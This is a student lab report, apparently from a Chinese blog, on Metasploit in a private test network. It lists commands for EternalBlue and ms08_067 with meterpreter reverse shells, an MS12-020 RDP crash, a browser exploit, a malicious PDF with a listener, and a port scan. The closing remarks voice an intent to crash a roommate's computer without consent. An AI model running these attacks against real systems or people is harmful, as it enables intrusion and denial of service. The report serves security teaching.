实践内容(3.5分)

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.1一个主动攻击实践(1分)

  • ms08_067; (失败)
  • MS17-010永恒之蓝(成功)
  • MS12-20(比永恒之蓝更蓝的蓝屏)(本来以为唯一后来不唯一了)

1.2 一个针对浏览器的攻击(1分)

  • ms14_064(成功)

1.3 一个针对客户端的攻击(1分)

  • Adobe(成功)

1.4 成功应用任何一个辅助模块。(0.5分)

  • 扫描查看靶机开放端口(唯一)

    以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分。

实验过程

基础问题回答

(1)用自己的话解释什么是exploit,payload,encode.

任务一:一个主动攻击实践

漏洞MS08_067

关于漏洞MS08_067的原理

msfconsole进入msf控制台

search ms08_067查看该漏洞

use exploit/windows/smb/ms08_067_netapi使用该漏洞

show payloads回链攻击载荷


set LHOST 192.168.70.131 //攻击机的ip地址 set LPORT 5231 //攻击的端口 set RHOST 192.168.70.140 //靶机的ip地址 set target 0 //选择目标系统类型 exploit //进行攻击

关闭防火墙,改变安全策略,查看445端口状况,甚至改变winxp版本,由中文版改成英文版

很遗憾始终是只能检测出系统却无法生成有效的会话

ms17_010永恒之蓝

攻击方:kali 192.168.70.131

靶机:win7 192.168.70.130

输入msfconsole指令,打开控制台;

依次输入以下指令进行设置与攻击:


set payload windows/x64/meterpreter/reverse_tcp //选择攻击载荷 set LHOST 192.168.70.131 //设置攻击方ip set RHOST 192.168.70.130 //设置靶机ip

exploit

连接成功



尝试命令查看靶机ip

MS12-20

攻击机kali          192.168.70.131

靶机windows 7   192.168.70.130

用kali自带的的扫描工具nmap 查看靶机是否开启3389端口。(没开就把他打开!)

扫描之后发现3389是开放的,然后启动msfconsole, 利用里面的模块查看是否存在Ms12-020漏洞。



查询模块

set RHOST 192.168.70.130 //设置靶机地址

然后exploit



100%表示可以攻击

攻击模块

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids //加载攻击模块
set RHOST 192.168.70.130 //设置靶机地址

然后还是exploit



出现seems down说明靶机已经蓝上了!


一个针对浏览器的攻击

ms14_064

主机 kali 192.168.70.131

靶机 Windows XP SP3 192.168.70.141

set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.70.131
set LPORT 2016
set URIPATH wyhy

然后exploit开启监听,然后生成网址,将这个网址在靶机打开后攻击机就捕获了靶机,建立会话

一个针对客户端的攻击

Adobe

攻击方:kali 192.168.70.131

靶机:winxp 192.168.70.141

输入msfconsole指令,打开控制台;

依次输入以下指令进行设置

set payload windows/meterpreter/reverse_tcp     //设置tcp反向连接
set LHOST 192.168.70.131//攻击方IP
set LPORT 5231 //攻击方攻击端口
set FILENAME wyhy_exp5.pdf

在终端中,将生成的文件按照文件路径复制出来,并复制到靶机中

在kali中重新打开,并输入以下指令进行监听:

use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/reverse_tcp //设置tcp反向连接
set LHOST 192.168.70.131 //攻击方IP
set LPORT 5231 //攻击方攻击端口
exploit //监听

辅助模块

查看靶机端口

使用auxiliary/scanner/portscan/tcp模块,用来扫描靶机的TCP端口使用情况;

执行命令use auxiliary/scanner/portscan/tcp进入并使用模块;

show options查看需要设置的参数信息,设置靶机的ip为RHOST

set PORT 1-5231

然后expolit

基础问题回答

  • 用自己的话解释什么是exploit,payload,encode.

    exploit:英文翻译为利用,黑客就是利用漏洞对电脑进行攻击,有漏洞不一定可以利用,但可以利用的一定有漏洞。

    payload:有效载荷。通常在传输数据时,为了使数据传输更可靠,要把原始数据分批传输,并且在每一批数据的头和尾都加上一定的辅助信息,而其中的原始数据就是payload

    encode:编码器,用来给payload进行编码,保护payload不被发现

离实战还缺些什么技术或步骤?

实战?首先我们只能在自己的局域网内实现。对于外网,不在同一子网下的地址锁定无法实现就无法实战攻击,我觉得这是目前最大缺憾。

实验感想

这次我最喜欢的就是那个蓝屏漏洞,在CSDN上逛到的以为我是独一无二结果……不过还是觉得那个很好玩,起初想做这个是想搞一下正在打Apex的室友让他感受一下快要吃鸡蓝个屏,但是系统版本高了没啥用。后续我会继续利用更新的漏洞让室友感受吃不到鸡的乐趣o( ̄▽ ̄)o

2018-2019 网络对抗技术 20165231 Exp5 MSF基础应用的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 一. 实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要 ...

  2. 2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi:自动化 ...

  3. 2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用 实践原理 1.MSF攻击方法 主动攻击:扫描主机漏洞,进行攻击 攻击浏览器 攻击其他客户端 2.MSF的六个模块 查看 ...

  4. 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用

    <网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...

  5. 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...

  6. 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...

  7. 2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用 目录 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi: ...

  8. 20165214 2018-2019-2 《网络对抗技术》Exp5 MSF基础应用 Week8

    <网络对抗技术>Exp5 MSF基础应用 Week8 一.实验目标与内容 1.实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体我 ...

  9. 2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用 exploit选取 主动攻击:ms17_010_eternalblue(唯一) 浏览器攻击:ms05_054_onlo ...

随机推荐

  1. 随心测试_软测基础_001<说在开始_测试理念>

  2. Java BigDecimal类型的 加减乘除运算

    原文: https://blog.csdn.net/xuwei_net/article/details/81253471 加法:add 减法:subtract 乘法:multiply 除法:divid ...

  3. 关于H5从PC端切换到移动端,屏幕显示内容由横向转为竖向的研究!

    1.前言: 在项目中,我们常会遇见在手机端需要横屏观看的效果,而在pc端则默认切换到竖屏的样式. 或者是,UI提供的图是一个长图,但是在移动端我们需要让这个图在手机横屏时显示. 以上两个都需要我们实行 ...

  4. vue 父子之间的通讯

    //父组件<template>     <Button @click='openChild'><Button>      <child-modal :moda ...

  5. 开发工具之Vscode编辑器

    Visual Studio Code(以下简称vscode)是一个轻量且强大的代码编辑器,支持Windows,OS X和Linux.内置JavaScript.TypeScript和Node.js支持, ...

  6. Oracle查询字符串数据进行排序,以及去重复

    原本的的一张表,填写数据的字段为字符串varchar2类型,然后进行排序的时候,就会出现问题.会默直接默认判断为第一个数字9最大,而不判断整个数字的大小. 所以,就要用到TO_NUMBER函数 sel ...

  7. centos下安装nginx并部署angular应用

    注意:直接yum安装的nginx有问题,不能直接安装,因为centos默认库里面没有nginx.如果安装过程中出现一些文件夹或者文件找不到的话,应该是你的nginx的版本没有安装对.最效率的办法是删除 ...

  8. 前端知识之jQuery

    通过 jQuery,您可以选取(查询,query) HTML 元素,并对它们执行"操作"(actions). http://www.runoob.com/jquery/jquery ...

  9. Codeforces Round #522 (Div. 2, based on Technocup 2019 Elimination Round 3)B. Personalized Cup

    题意:把一长串字符串 排成矩形形式  使得行最小  同时每行不能相差大于等于两个字符 每行也不能大于20个字符 思路: 因为使得行最小 直接行从小到大枚举即可   每行不能相差大于等于两个字符相当于  ...

  10. AttributeError: 'NoneType' object has no attribute 'split' 报错处理

    报错场景 social_django 组件对原生 django 的支持较好, 但是因为 在此DRF进行的验证为 JWT 方式 和 django 的验证存在区别, 因此需要进行更改自行支持 JWT 方式 ...